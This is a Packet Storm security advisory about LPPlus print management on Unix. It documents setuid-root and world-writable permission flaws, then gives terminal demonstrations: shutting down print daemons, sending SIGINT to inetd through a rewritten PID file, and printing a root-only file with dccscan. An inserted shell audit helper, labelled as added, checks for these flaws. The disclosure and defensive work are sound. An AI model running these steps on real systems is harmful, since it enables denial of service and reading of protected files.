Reported by Echo8, 18 Sep 2001. Type: packetstorm. Source: packetstormsecurity.com

Multiple security holes in LPPlus print management may compromise system integrity and security.

Multiple Security Holes in LPPlus  
---------------------------------  
echo8, 8/23/2000  
  
Summary  
-------  
  
LPPlus is Plus Technologies' print management system for unix. Versions prior  
to v3.3.x have several serious security holes, some of which undermine the   
integrity of the printing subsystem, some of which threaten the security of   
the system on which the product is installed.  
  
Upgrade is available here: mailto:[email protected]  
  
Details  
-------  
  
Hole #1:   
  
Of the 74 binaries that the installer put on my Solaris system, 26 were  
installed suid to root and world-executable. On my linux box, it was 26  
out of 64. Several of these should not be suid-root, or should be  
group-executable only, and carefully restricted.  
  
For example, the following binaries are installed mode 4755 by the  
installer:   
  
$LPHOME/bin/dccsched  
$LPHOME/bin/dcclpdser  
$LPHOME/bin/dccbkst  
$LPHOME/bin/dccshut  
$LPHOME/bin/dcclpdshut  
$LPHOME/bin/dccbkstshut  
  
The first three start the scheduler, LPD server and network status  
daemons, respectively. The next three stop the aforementioned services. In  
the default configuration, all six can be executed by any unprivileged  
user, effectively giving any user on the system the ability to start and  
stop printing services. No checking of userid, group or anything else is  
done prior to execution.   
  
Hole #2:  
  
$LPHOME/system/lpdprocess is created mode 777.   
  
This file contains the process ID of the dcclpdser process. The  
combination of this file's permissions and the fact that dcclpdshut is  
executable by any user allows an unprivileged user to send signal 2  
(SIGINT) to any process on the system. All that's required is for an  
unprivileged user to replace the PID in $LPHOME/system/lpdprocess with the  
PID of their target process and then run $LPHOME/bin/dcclpdshut.  
  
Hole #3:   
  
$LPHOME/bin/dccscan is suid-root and can be executed by any user. It may  
allow an unprivileged user to print files to which he does not have read  
access. The ramifications are fairly obvious: although an unprivileged  
user cannot read /etc/shadow (for example), using this utility, he may be  
able to print it out. In my testing, this worked even when sending to  
printers to which my user was not given any access in the LPPlus security  
configuration (in fact, my test user had no access to ANY printers, or ANY  
LPPlus services).   
  
Some other potential holes:  
  
* if the archive module is installed, $LPHOME/bin/dccasweep can be  
executed by any user. This may undermine the integrity of the archiving  
facility.   
  
* if the web interface is installed, it utilizes a very old beta version  
of apache, and the installation requires that the server (and all of  
its children, which run as nobody out-of-the-box) run as root.   
  
* on the linux system, $LPHOME was created mode 777. Root's umask was set  
to 022. This didn't seem to be the case on the Solaris system, although  
the reason for this may be the different version of LPPLUS rather than the  
different unixes (see below for version info).   
  
Demonstrations  
--------------  
  
Hole #1:   
  
$ id  
uid=600(test) gid=300(users)  
$ ps -ef|grep dcc  
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc  
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched  
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser  
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst  
$ dccbkstshut  
$ dcclpdshut  
LPD048E Signal sent to dcclpdser to shut down.  
$ dccshut  
LPP054I LP Plus scheduler ordered to shutdown.  
$ ps -ef|grep dcc   
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc   
$  
  
Hole #2  
  
$ id  
uid=600(test) gid=300(users)  
$ ps -ef|grep inet  
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet  
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s  
$ cat > $LPHOME/system/lpdprocess  
12276  
^D  
$ dcclpdshut  
LPD048E Signal sent to dcclpdser to shut down.  
$ ps -ef|grep inet  
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet  
$   
  
Hole #3:  
  
# id  
uid=0(root) gid=1(other)  
# ls -alt /root/test  
total 6  
drwx------ 2 root other 512 Sep 5 17:46 .  
-r-------- 1 root other 365 Sep 5 17:46 foo  
drwx------ 3 root other 512 Sep 5 17:46 ..  
# su - test  
Sun Microsystems Inc. SunOS 5.6 Generic August 1997  
$ id  
uid=600(test) gid=300(users)  
$ ls -alt /root/test  
/root/test: Permission denied  
$ dccscan /root/test 30 5 "-dlp0"  
$  
  
# now, go to the printer and wait for the files to come out, or watch them   
# being queued as root, if you have access to dccstat  
  
Vulnerable Versions   
-------------------  
  
3.3.0 for Unix (on Solaris 2.6).   
3.2.1 for Linux (on Redhat 5.2).  
* These are the only versions I had available for testing.  
  
Workarounds  
-----------  
  
At this time, no patches or updated versions are available. However, most  
of the utilities in question either don't need to be suid, or can be  
group-owned by a more restricted group and mode 4750. The web interface  
works fine with a newer version of apache, and the web server does not  
need to run with all the children spawned as root.   
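The following audit helper is an added example, not part of the advisory or of LPPlus. It implements the checks behind Hole #1, Hole #2 and this workaround section: it lists files under $LPHOME/bin that are set-uid and world-executable (mode 4755), lists world-writable files under $LPHOME (such as system/lpdprocess at mode 777), applies the 4750/restricted-group change to one binary, and shows the test a shutdown wrapper should make before it signals a PID read from a file. The /opt/lpplus default and the group name passed to the hardening function are assumptions.

```shell
#!/bin/sh
# Added audit helper (not from the advisory or the vendor). Assumes LPHOME
# defaults to /opt/lpplus, as in the advisory's demonstration output.
LPHOME="${LPHOME:-/opt/lpplus}"

# Regular files under DIR/bin with both the set-uid bit and other-execute set.
list_suid_world_exec() {
    find "$1/bin" -type f -perm -4001 2>/dev/null | sort
}

# Regular files under DIR that any user may write to.
list_world_writable() {
    find "$1" -type f -perm -0002 2>/dev/null | sort
}

# The advisory's workaround for one binary: restricted group and mode 4750, so
# it stays set-uid but only members of GROUP (an assumed name) can execute it.
harden_suid_binary() {          # harden_suid_binary FILE GROUP
    chgrp "$2" "$1" && chmod 4750 "$1"
}

# Refuse to trust a PID file that is group- or world-writable (any user could
# have replaced the PID, as in Hole #2) or whose PID does not belong to the
# expected command. Returns 0 only when both checks pass.
pid_file_trustworthy() {        # pid_file_trustworthy FILE EXPECTED_COMMAND
    f="$1"; want="$2"
    [ -f "$f" ] || return 1
    [ -z "$(find "$f" \( -perm -0020 -o -perm -0002 \))" ] || return 1
    pid=$(head -n 1 "$f" | tr -dc '0-9')
    [ -n "$pid" ] || return 1
    # ps -p is the portable form; /proc is the fallback for minimal Linux ps.
    comm=$( { ps -p "$pid" -o comm= 2>/dev/null || cat "/proc/$pid/comm" 2>/dev/null; } | sed 's/^ *//')
    [ "$comm" = "$want" ]
}

# Stand-alone usage: report only, change nothing.
if [ "${1:-}" = "--audit" ]; then
    echo "set-uid + world-executable under $LPHOME/bin:"; list_suid_world_exec "$LPHOME"
    echo "world-writable under $LPHOME:"; list_world_writable "$LPHOME"
    pid_file_trustworthy "$LPHOME/system/lpdprocess" dcclpdser \
        && echo "lpdprocess: OK" || echo "lpdprocess: NOT trustworthy"
fi
```

Run with `--audit` as root on the installed system; the hardening function is applied per binary after deciding which of the 26 set-uid files actually need root.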
  
The vendor was notified of these problems on 8/24/2000. They did respond,  
confirming the existence of the holes. However, a request for an ETA on an  
updated release or patches has thus far been ignored.   
  